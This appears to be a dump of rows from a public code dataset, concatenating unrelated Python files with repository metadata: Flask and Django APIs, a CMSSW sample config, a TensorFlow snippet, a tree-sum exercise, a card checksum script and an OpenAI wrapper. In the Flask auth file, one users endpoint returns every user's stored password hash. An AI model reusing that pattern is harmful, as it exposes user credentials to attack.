print(steps(16)) | Japarraes/Python_Exercism | Numbers/collatz_conjeture.py | collatz_conjeture.py | py | 317 | python | en | code | 0 | github-code | 50 |
44705708478 | from app.main.model.models import Book, Users
from flask_restful import Resource
from flask import jsonify, request, make_response
import datetime
import jwt
from flask import Blueprint
from functools import wraps
from werkzeug.security import check_password_hash, generate_password_hash
from bson.objectid import ObjectId
from flask_jwt_extended import (
jwt_required,
create_access_token,
create_refresh_token,
get_jwt_identity,
)
auth_api = Blueprint("auth_api", __name__)
arr = []
class PostApiView(Resource):
    """CRUD endpoints for Book documents (MongoEngine).
    Every verb responds with the full, freshly re-serialised Book collection.
    """
    def get(self):
        """List all books as [{id, title, text}, ...]."""
        books = Book.objects.all()
        result = [
            {"id": str(book.id), "title": book.title, "text": book.text}
            for book in books
        ]
        return jsonify(result)
    def post(self):
        """Create a book from the JSON body's 'title' and 'text'."""
        new_one = request.get_json()
        Book(title=new_one["title"], text=new_one["text"]).save()
        books = Book.objects.all()
        result = [
            {"id": str(book.id), "title": book.title, "text": book.text}
            for book in books
        ]
        return jsonify(result)
    def put(self):
        """Update a book with the JSON body's fields.
        NOTE(review): the target is hard-coded to title="cool story" —
        looks like leftover test code; the book to update should probably
        come from the request. Confirm intended behaviour.
        """
        new_one = request.get_json()
        Book.objects.get(title="cool story").update(**new_one)
        # Book(title=new_one["title"], text=new_one["text"]).save()
        books = Book.objects.all()
        result = [
            {"id": str(book.id), "title": book.title, "text": book.text}
            for book in books
        ]
        return jsonify(result)
    def delete(self):
        """Delete the book matching the JSON body's exact title and text.
        NOTE(review): .get() raises DoesNotExist (-> 500) when no exact
        match is found.
        """
        new_one = request.get_json()
        Book.objects.get(title=new_one["title"], text=new_one["text"]).delete()
        books = Book.objects.all()
        result = [
            {"id": str(book.id), "title": book.title, "text": book.text}
            for book in books
        ]
        return jsonify(result)
class LoginApi(Resource):
    """POST /login — verify credentials and issue JWT access/refresh tokens."""
    def post(self):
        """Authenticate the JSON body's username/password.

        On success returns {"user": {username, access, refresh}}; otherwise
        a 401 with a WWW-Authenticate challenge.
        """
        # Imported here to avoid a circular import with the app module.
        from manage import app
        auth = request.get_json()
        # NOTE(review): if the username does not exist, .first() returns
        # None and .psw raises AttributeError (-> 500) before the 401 path
        # is ever reached; confirm and guard.
        if auth and check_password_hash(
            Users.objects.filter(name=auth["username"]).first().psw, auth["password"]
        ):
            user = Users.objects.filter(name=auth["username"]).first()
            # Hand-rolled access token: 30-minute expiry, app-secret signed.
            token = jwt.encode(
                {
                    "user_id": str(user.id),
                    "user": auth["username"],
                    "exp": datetime.datetime.utcnow() + datetime.timedelta(minutes=30),
                },
                app.config["SECRET_KEY"],
            )
            refresh = create_refresh_token(identity=str(user.id), expires_delta=datetime.timedelta(minutes=30))
            return jsonify(
                {
                    "user": {
                        "username": user.name,
                        "access": token.decode("UTF-8"),  # presumably PyJWT < 2 (bytes) — confirm version
                        "refresh": refresh
                    }
                }
            )
        # Wrong password or missing body: challenge the client.
        return make_response(
            "Could not verify",
            401,
            {"WWW-Authenticate": 'Basic realm="Login required"'},
        )
def token_required(f):
    """Decorator for views that require a valid JWT.

    Reads the token from the 'x-access-token' request header, decodes it
    with the app secret, looks up the matching Users document and passes it
    to the wrapped view as its first argument.  Responds 403 when the
    header is missing or the token cannot be validated.
    """
    @wraps(f)
    def decorated(*args, **kwargs):
        # Imported here to avoid a circular import with the app module.
        from manage import app
        token = request.headers.get("x-access-token", "")
        if not token:
            return jsonify({"message": "token is missing"}), 403
        try:
            data = jwt.decode(token, app.config["SECRET_KEY"])
            current_user = Users.objects.filter(id=ObjectId(data["user_id"])).first()
        except Exception:
            # Any decode/lookup failure is treated as an invalid token.
            # (Fixed the user-facing "tocken" typo.)
            return jsonify({"message": "token is invalid"}), 403
        return f(current_user, *args, **kwargs)
    return decorated
@auth_api.route('/token/refresh', methods=["POST"])
@jwt_required
def refresh_users_token():
    """Issue a fresh 40-minute access token for the identity carried by the
    presented JWT."""
    identity = get_jwt_identity()
    access = create_access_token(identity=identity, expires_delta=datetime.timedelta(minutes=40))
    return jsonify({
        'access': access
    })
@auth_api.route("/unprotected")
def unprotected(current_user):
return jsonify({"massage": "this page anyone can see"})
@auth_api.route("/protected")
@token_required
def protected(current_user):
return jsonify({"massage": "this page can see only users with valid token"})
@auth_api.route("/users/")
@token_required
def get_users(current_user):
users = Users.objects.all()
print(current_user)
response = {
"users": [{"username": user.name, "password": user.psw} for user in users]
}
return jsonify(response)
@auth_api.route("/users/", methods=["POST"])
def create_users():
data = request.get_json()
Users(name=data["name"], psw=generate_password_hash(data["password"])).save()
return jsonify({"message": "user added successfully"})
@auth_api.route("/users/", methods=["PUT"])
@token_required
def change_cur_user(current_user):
data = request.get_json()
current_user.update(**data)
return jsonify({"message": "user changed successfully"})
@auth_api.route("/users/", methods=["DELETE"])
@token_required
def delete_cur_user(current_user):
print(f"current_user - {current_user}")
current_user.delete()
return jsonify({"message": "user deleted successfully"})
| YaroslavYaryk/Programming | Python/FlaskApp/app/main/controller/auth_api.py | auth_api.py | py | 5,135 | python | en | code | 0 | github-code | 50 |
24311435778 | from .models import Order
from .form import OrderForm
def sort_orders(queryset):
    """Score every Order in *queryset* and persist score/alias per order.

    The score blends urgency (70%) with queryset position (30%); earlier
    orders receive a larger position weight.  Returns {order name: score}.
    """
    new_sorted = {}
    i = 0
    for item in queryset:
        i += 1
        urgency_weight = (int(item.urgency) * 0.7)
        # Earlier position in the queryset -> larger weight.
        position_weight = (len(queryset) - (i))*0.3
        name = item.name
        # NOTE(review): keyed by name, so orders sharing a name overwrite
        # each other here and desynchronise the pointer walk below.
        new_sorted[name] = urgency_weight + position_weight
    pointer = 0
    unique_id = 0
    # Walk the dict (insertion order mirrors queryset order) and write the
    # computed score plus a derived alias back to the database.
    for item in new_sorted:
        if item == queryset[pointer].name:
            # NOTE(review): unique_id is never incremented, so every alias
            # starts with "00" — presumably a bug; confirm intent.
            Order.objects.filter(name=item).update(alias=(str(unique_id) + str(unique_id) + str(queryset[pointer].id)))
            Order.objects.filter(name=item).update(score=new_sorted[item])
            pointer += 1
        else:
            pointer += 1
            continue
    return new_sorted
queryset = Order.objects.all()
sort_orders(queryset) | lukejamestyler/Bungee | src/CommunitySupport/need/sort.py | sort.py | py | 814 | python | en | code | 0 | github-code | 50 |
3195056829 | from flask import jsonify, request
from flask_restful import abort, Resource
from db import DBConn
def dict_factory(cursor, row):
    """sqlite3 row factory: map each result row to {column_name: value}."""
    column_names = (desc[0] for desc in cursor.description)
    return dict(zip(column_names, row))
class UserController(Resource):
    """REST resource for a single Users row, addressed by id."""
    def get(self, id):
        """Return the user with the given id as a dict, or abort with 404.

        Fixes: ``cur.execute(query, (id))`` passed a bare value — ``(id)``
        is not a tuple, so a multi-character id string was treated as a
        sequence of characters; the connection was also never closed.
        """
        conn = DBConn()
        conn.conn.row_factory = dict_factory
        cur = conn.conn.cursor()
        query = "SELECT * FROM Users WHERE id=?"
        cur.execute(query, (id,))  # parameters must be a sequence: (id,)
        data = cur.fetchall()
        conn.Close()  # previously leaked on every request
        if data:
            return data[0]
        abort(404, message=f"User {id} doesn't exist")
class UsersController(Resource):
    """REST resource for the Users collection (list / create)."""
    def get(self):
        """Return all users as a list of dicts.

        Fix: removed the leftover ``print(cur)`` debug statement.
        """
        conn = DBConn()
        conn.conn.row_factory = dict_factory
        cur = conn.conn.cursor()
        query = "SELECT * FROM Users"
        cur.execute(query)
        data = cur.fetchall()
        conn.Close()
        return data
    def post(self):
        """Create a user from the JSON body; 400 when required fields are missing.

        Fix: corrected the misspelled local ``requried_fields``.
        """
        req = request.get_json(force=True)
        required_fields = {'firstName', 'lastName', 'age', 'isBamaFan'}
        missing_fields = required_fields.difference(req)
        if missing_fields:
            abort(400, message=f"Request body missing values: {missing_fields}")
        conn = DBConn()
        cur = conn.conn.cursor()
        query = "INSERT INTO Users (firstName, lastName, age, isBamaFan) VALUES (?,?,?,?)"
        params = (req["firstName"], req["lastName"], req["age"], req["isBamaFan"])
        cur.execute(query, params)
        # Echo the payload back with the newly assigned primary key.
        data = req
        data["id"] = cur.lastrowid
        conn.conn.commit()
        conn.Close()
        return data
38750788230 | # Configurations dependent on the sample type.
import sys
import FWCore.ParameterSet.Config as cms
import os
if sys.version_info.major < 3:
from sets import Set as set
# All sample types the production code recognises: MC (including embedded
# 'Emb_*' samples) versus real collision data.
mcSampleTypes = set([ 'MC_16', 'MC_UL16', 'MC_UL16APV', 'MC_17', 'MC_UL17', 'MC_18', 'MC_UL18', 'Emb_16', 'Emb_17', 'Emb_18ABC', 'Emb_18D', 'MC_Phase2_113X', 'MC_Phase2_111X', 'MC_Phase2_110X', 'MC_RUN3_122X'])
dataSampleTypes = set([ 'Run2016' , 'Run2017', 'Run2018ABC', 'Run2018D', 'RunUL2018' ])
# Sample type -> data-taking period name (used by GetPeriod/GetPeriodCfg).
periodDict = { 'MC_16' : 'Run2016',
               'MC_UL16': 'Run2016',
               'MC_UL16APV': 'Run2016',
               'Run2016' : 'Run2016',
               'Emb_16' : 'Run2016',
               'MC_17' : 'Run2017',
               'MC_UL17': 'Run2017',
               'Run2017' : 'Run2017',
               'Emb_17' : 'Run2017',
               'MC_18' : 'Run2018',
               'MC_UL18' : 'Run2018',
               'Run2018ABC' : 'Run2018',
               'Run2018D' : 'Run2018',
               'RunUL2018' : 'Run2018',
               'Emb_18ABC' : 'Run2018',
               'Emb_18D' : 'Run2018',
               'MC_Phase2_110X' : 'Phase2',
               'MC_Phase2_111X' : 'Phase2',
               'MC_Phase2_113X' : 'Phase2',
               'MC_RUN3_122X': "Run3"
             }
# Sample type -> CMS conditions global tag (used by GetGlobalTag).
globalTagMap = { 'MC_16' : '102X_mcRun2_asymptotic_v7',
                 'MC_UL16': '106X_mcRun2_asymptotic_v17',
                 'MC_UL16APV': '106X_mcRun2_asymptotic_preVFP_v11',
                 'Run2016' : '102X_dataRun2_v12',
                 'Emb_16' : '102X_dataRun2_v12',
                 #'Emb_16' : '80X_dataRun2_2016SeptRepro_v7',
                 'MC_17' : '102X_mc2017_realistic_v7',
                 'MC_UL17': '106X_mc2017_realistic_v9',
                 'Run2017' : '102X_dataRun2_v12',
                 'Emb_17' : '102X_dataRun2_v12',
                 'MC_18' : '102X_upgrade2018_realistic_v20',
                 'MC_UL18' : '106X_upgrade2018_realistic_v16_L1v1',
                 'Run2018ABC' : '102X_dataRun2_v12',
                 'Run2018D' : '102X_dataRun2_Prompt_v15',
                 'RunUL2018' : '106X_dataRun2_v35',
                 'Emb_18ABC' : '102X_dataRun2_v12',
                 'Emb_18D' : '102X_dataRun2_Prompt_v15',
                 'MC_Phase2_110X' : '110X_mcRun4_realistic_v3',
                 'MC_Phase2_111X' : 'auto:phase2_realistic_T15',
                 'MC_Phase2_113X' : 'auto:phase2_realistic_T15',
                 'MC_RUN3_122X' : '122X_mcRun3_2021_realistic_v9'
               }
def IsEmbedded(sampleType):
    """Return True when sampleType is an embedded MC sample; exit on unknown types."""
    if sampleType not in mcSampleTypes and sampleType not in dataSampleTypes:
        print("ERROR: unknown sample type = '{}'".format(sampleType))
        sys.exit(1)
    return sampleType in mcSampleTypes and 'Emb' in sampleType
def IsData(sampleType):
    """Return True when sampleType denotes collision data; exit on unknown types."""
    if sampleType in dataSampleTypes:
        return True
    if sampleType in mcSampleTypes:
        return False
    print("ERROR: unknown sample type = '{}'".format(sampleType))
    sys.exit(1)
def GetPeriod(sampleType):
    """Return the data-taking period name for sampleType; exit if unknown."""
    try:
        return periodDict[sampleType]
    except KeyError:
        print("ERROR: unknown sample type = '{}'".format(sampleType))
        sys.exit(1)
def GetGlobalTag(sampleType):
    """Return the conditions global tag for sampleType; exit if unknown."""
    try:
        return globalTagMap[sampleType]
    except KeyError:
        print("ERROR: unknown sample type = '{}'".format(sampleType))
        sys.exit(1)
def isRun2UL(sampleType):
    """Return True for Run-2 ultra-legacy samples; exit if sampleType is unknown."""
    if sampleType not in periodDict:
        print("ERROR: unknown sample type = '{}'".format(sampleType))
        sys.exit(1)
    return sampleType in ('MC_UL16', 'MC_UL16APV', 'MC_UL17', 'MC_UL18', 'RunUL2018')
def isPhase2(sampleType):
    """Return True for Phase-2 upgrade MC samples; exit if sampleType is unknown."""
    if sampleType not in periodDict:
        print("ERROR: unknown sample type = '{}'".format(sampleType))
        sys.exit(1)
    return sampleType in ('MC_Phase2_113X', 'MC_Phase2_111X', 'MC_Phase2_110X')
def isRun2PreUL(sampleType):
    """Return True for pre-ultra-legacy Run-2 samples; exit if sampleType is unknown."""
    if sampleType not in periodDict:
        print("ERROR: unknown sample type = '{}'".format(sampleType))
        sys.exit(1)
    return sampleType in ('MC_16', 'MC_17', 'MC_18', 'Run2018ABC', 'Run2018D', 'Emb_18ABC', 'Emb_18D')
def isRun3(sampleType):
    """Return True for Run-3 MC samples; exit if sampleType is unknown."""
    if sampleType not in periodDict:
        print("ERROR: unknown sample type = '{}'".format(sampleType))
        sys.exit(1)
    return sampleType == 'MC_RUN3_122X'
def GetPeriodCfg(sampleType):
    """Return the CMSSW Era configuration object for the sample's period.

    Era modules are imported lazily because they only resolve inside a
    CMSSW runtime environment.
    """
    period = GetPeriod(sampleType)
    if period == 'Run2016':
        from Configuration.Eras.Era_Run2_2016_cff import Run2_2016
        return Run2_2016
    elif period == 'Run2017':
        from Configuration.Eras.Era_Run2_2017_cff import Run2_2017
        return Run2_2017
    elif period == 'Run2018':
        from Configuration.Eras.Era_Run2_2018_cff import Run2_2018
        return Run2_2018
    elif period == 'Phase2':
        from Configuration.Eras.Era_Phase2C9_cff import Phase2C9
        return Phase2C9
    elif period == 'Run3':
        from Configuration.Eras.Era_Run3_cff import Run3
        return Run3
    else:
        raise RuntimeError('Period = "{}" is not supported.'.format(period))
| dimaykerby/DisTauMLTools | Production/python/sampleConfig.py | sampleConfig.py | py | 5,075 | python | en | code | 0 | github-code | 50 |
41154480733 | import tensorflow as tf
# TF1-style graph example: evaluates linear_model = W * x + b for a batch of x.
W = tf.Variable([.3], tf.float32, name='weight')
b = tf.Variable([-.3], tf.float32, name='bias')
x = tf.placeholder(tf.float32)  # input fed at session-run time
linear_model = W * x + b
init = tf.global_variables_initializer()  # variables need explicit init in TF1
with tf.Session() as sess:
    sess.run(init)
    print(sess.run(linear_model, {x: [1, 2, 3, 4]}))
| shirakiya/practice-tensorflow | get_started/variable.py | variable.py | py | 320 | python | en | code | 0 | github-code | 50 |
70082184477 | class Node:
    def __init__(self, data):
        """Binary-tree node holding `data`, with initially empty children."""
        self.left = None
        self.right = None
        self.data = data
def TreeSumming(node, sum, val):
    """Return True if any root-to-leaf path starting at `node` sums to `val`.

    `sum` is the running total of the path so far, including node.data.
    Every node is visited once, so this runs in O(n) for n nodes.
    """
    # Leaf: the accumulated path total decides the answer.
    if node.left is None and node.right is None:
        return sum == val
    in_left = node.left is not None and TreeSumming(node.left, sum + node.left.data, val)
    in_right = node.right is not None and TreeSumming(node.right, sum + node.right.data, val)
    return in_left or in_right
# Sample tree (classic path-sum fixture); the path 5-4-11-2 sums to 22.
root = Node(5)
root.left = Node(4)
root.left.left = Node(11)
root.left.left.left = Node(7)
root.left.left.right = Node(2)
root.right = Node(8)
root.right.left = Node(13)
root.right.right = Node(4)
root.right.right.right = Node(1)
print(TreeSumming(root, root.data, 22)) | amchp/ST0245-001 | laboratorios/lab04/ejercicioEnLinea/TreeSumming.py | TreeSumming.py | py | 746 | python | en | code | 0 | github-code | 50 |
709736238 | from django.shortcuts import render
from django.core import serializers
from django.http import JsonResponse
from django.core.serializers.json import DjangoJSONEncoder
from mesineapp.models import *
import json
# Create your views here.
def social_network_type(request):
    """Return all non-deleted social-network types as an indented JSON payload."""
    rows = نوع_شبکه_اجتماعی.objects.filter(حذف = 0)
    banner_list = [
        {'social_network_type': {'id': row['شناسه'], 'text': row['متن']}}
        for row in rows.values()
    ]
    result = {
        "ok": True,
        "status_code": 200,
        "result": banner_list,
    }
    return JsonResponse(result, json_dumps_params={'indent': 2}, safe=False)
def social_network(request):
    """Return all non-deleted social-network accounts, each with a profile link.

    Fix: removed a leftover debug print of the raw queryset values.
    """
    rows = شبکه_اجتماعی.objects.filter(حذف = 0)
    banner_list = []
    for items in rows.values():
        banners = {}
        banners['id'] = items['شناسه']
        banners['username'] = items['نام_کاربری']
        # Type id 1 -> Instagram link, type id 2 -> Telegram link.
        if items['نوع_شبکه_اجتماعی_id'] == 1:
            banners['link'] = "instagram.com/" + items['نام_کاربری']
        if items['نوع_شبکه_اجتماعی_id'] == 2:
            banners['link'] = "telegram.me/" + items['نام_کاربری']
        banner_list.append({'social_network': banners})
    result = {
        "ok": True,
        "status_code": 200,
        "result": banner_list,
    }
    return JsonResponse(result, json_dumps_params={'indent': 2}, safe=False)
| HosseinKeramati/mesine | mesineapp/controllers/social_network.py | social_network.py | py | 1,605 | python | en | code | 0 | github-code | 50 |
70578895835 | # card_no = "5610591081018250"
# Luhn-style checksum validation for a 16-digit card number.
# card_no = "5610591081018250"
# Declarations
odd_sum = 0
even_sum = 0
double_list = []
# Checking card number
# NOTE(review): only the length is checked here; non-digit characters
# will crash int(val) below -- confirm whether that is acceptable.
while True:
    card_num = input("Please input your card number(There should be up to 16 digits):")
    if len(card_num) == 16:
        break
    else:
        continue
number = list(card_num)
# Odd positions are summed as-is; even positions (0, 2, ...) are doubled.
for (idx, val) in enumerate(number):
    if idx % 2 != 0:
        odd_sum += int(val)
    else:
        double_list.append(int(val)*2)
# converting the list into a string
double_string = ""
for x in double_list:
    double_string += str(x)
# converting the string into a list
# (this splits two-digit doubled values into their individual digits)
double_list = list(double_string)
# adding even numbers
for x in double_list:
    even_sum += int(x)
# Adding sum and validation: a total divisible by 10 means a valid number.
net_sum = odd_sum + even_sum
if net_sum % 10 == 0:
    print('This is a valid card')
else:
    print('Invalid card')
| bitmap357/Credit_Card_Validator | Validator App.py | Validator App.py | py | 833 | python | en | code | 0 | github-code | 50 |
6399540886 | from rest_framework import serializers
from .models import Message, ChatRoom
from collections import OrderedDict
class MessageSerializer(serializers.ModelSerializer):
    """Serialize Message rows, dropping keys whose value is None."""
    image = serializers.ImageField(allow_null=True)

    def to_representation(self, instance):
        rep = super().to_representation(instance)
        # Strip None-valued keys so optional fields vanish from the payload.
        return OrderedDict((key, value) for key, value in rep.items() if value is not None)

    class Meta:
        model = Message
        fields = ['__str__', 'content', 'image', 'created_at']
class ChatRoomSerializer(serializers.ModelSerializer):
    """Expose only the room image of a ChatRoom."""
    class Meta:
        model = ChatRoom
        fields = ['room_image']
| Aron-S-G-H/django-chat-application | chat_app/serializer.py | serializer.py | py | 731 | python | en | code | 6 | github-code | 50 |
70579004635 | import sys
sys.path.append(".")
from dao.daoRRHH import daoRRHH
from modelo.personal import Personal
class daoJRRHH(daoRRHH):
    """HR DAO specialised for filtered staff-roster queries."""
    def getRegistrosFiltro(self, Personal):
        """Fetch up to 10 staff rows matching the filter fields of `Personal`
        (gender, job title, area, department); empty fields match everything
        because each value is wrapped in SQL LIKE wildcards.

        NOTE(review): execution errors are only printed; fetchall() is still
        called afterwards and may return stale or no results -- confirm this
        best-effort behaviour is intended.
        """
        sql_filtrarNomina = """SELECT `personalRut`, `personalNombre`, `personalGenero`,
                            `cargoNombre`, `areaNombre`, `departamentoNombre`
                            FROM `personal` P JOIN `cargo` C ON P.cargoID = C.cargoID
                            JOIN `departamento` D on P.departamentoID = D.departamentoID JOIN
                            `area` A on P.areaID = A.areaID
                            WHERE `personalGenero` LIKE %s AND `cargoNombre` LIKE %s
                            AND areaNombre LIKE %s AND departamentoNombre LIKE %s LIMIT 10"""
        try:
            self.cursor.execute(sql_filtrarNomina, ("%"+Personal.personalGenero+"%", "%"+Personal.cargoNombre+"%", "%"+Personal.areaNombre+"%", "%"+Personal.departamentoNombre+"%",))
        except Exception as ex:
            print(ex)
        return self.cursor.fetchall()
| bluuscript/app | dao/daoJRRHH.py | daoJRRHH.py | py | 956 | python | es | code | 0 | github-code | 50 |
4553730026 | import local_secrets as secrets
from openai import AsyncOpenAI
import openai
import logging
#from openai.embeddings_utils import get_embedding as openai_get_embedding
# Module-wide configuration and clients: the sync client serves generate()
# and get_embedding(); the async client serves agenerate().
OPENAI_API_KEY = secrets.OPENAI_API_KEY
#COMPLETION_MODEL = 'gpt-3.5-turbo'
#COMPLETION_MODEL = 'gpt-4-32k'
COMPLETION_MODEL = 'gpt-4-1106-preview'
EMBEDDING_MODEL = "text-embedding-ada-002"
MAX_TOKENS = 400  # cap on generated completion tokens per request
logger = logging.getLogger(__name__)
logger.info('openai_wrapper loaded')
client = openai.OpenAI(api_key=OPENAI_API_KEY)
aclient = AsyncOpenAI(api_key=OPENAI_API_KEY)
def generate(messages, temperature=0, response_format='text'):
    """Run a synchronous chat completion and return the response text.

    messages: chat-format message list passed straight to the API.
    response_format: 'text' (default) or any other value for JSON mode.
    Returns the literal string "ERROR" on failure (callers rely on this).

    Fixes: removed leftover debug prints; error log previously carried the
    wrong function names ('query_model' / 'agenerate').
    """
    if response_format == 'text':
        rf = {"type": "text"}
    else:
        rf = {"type": "json_object"}
    try:
        completion = client.chat.completions.create(
            model=COMPLETION_MODEL,
            messages=messages,
            max_tokens=MAX_TOKENS,
            response_format=rf,
            temperature=temperature
        )
        response = completion.choices[0].message.content
    except Exception as e:
        logger.error('generate error: ' + str(e))
        logger.error(messages)
        response = "ERROR"
    return response
async def agenerate(messages, temperature=0, response_format='text'):
    """Async variant of generate(): run a chat completion and return the text.

    messages: chat-format message list passed straight to the API.
    response_format: 'text' (default) or any other value for JSON mode.
    Returns the literal string "ERROR" on failure (callers rely on this).

    Fixes: removed leftover debug prints; the error print carried the wrong
    function name ('query_model') and duplicated the logger call.
    """
    if response_format == 'text':
        rf = {"type": "text"}
    else:
        rf = {"type": "json_object"}
    try:
        completion = await aclient.chat.completions.create(
            model=COMPLETION_MODEL,
            messages=messages,
            max_tokens=MAX_TOKENS,
            response_format=rf,
            temperature=temperature
        )
        response = completion.choices[0].message.content
    except Exception as e:
        logger.error('agenerate error: ' + str(e))
        logger.error(messages)
        response = "ERROR"
    return response
def get_embedding(text):
    """Return the embedding vector (list of floats) for `text` via EMBEDDING_MODEL."""
    response = client.embeddings.create(
        model=EMBEDDING_MODEL,
        input=text,
        encoding_format="float"
    )
    return response.data[0].embedding
| cliff-rosen/datatrove | openai_wrapper.py | openai_wrapper.py | py | 2,293 | python | en | code | 0 | github-code | 50 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.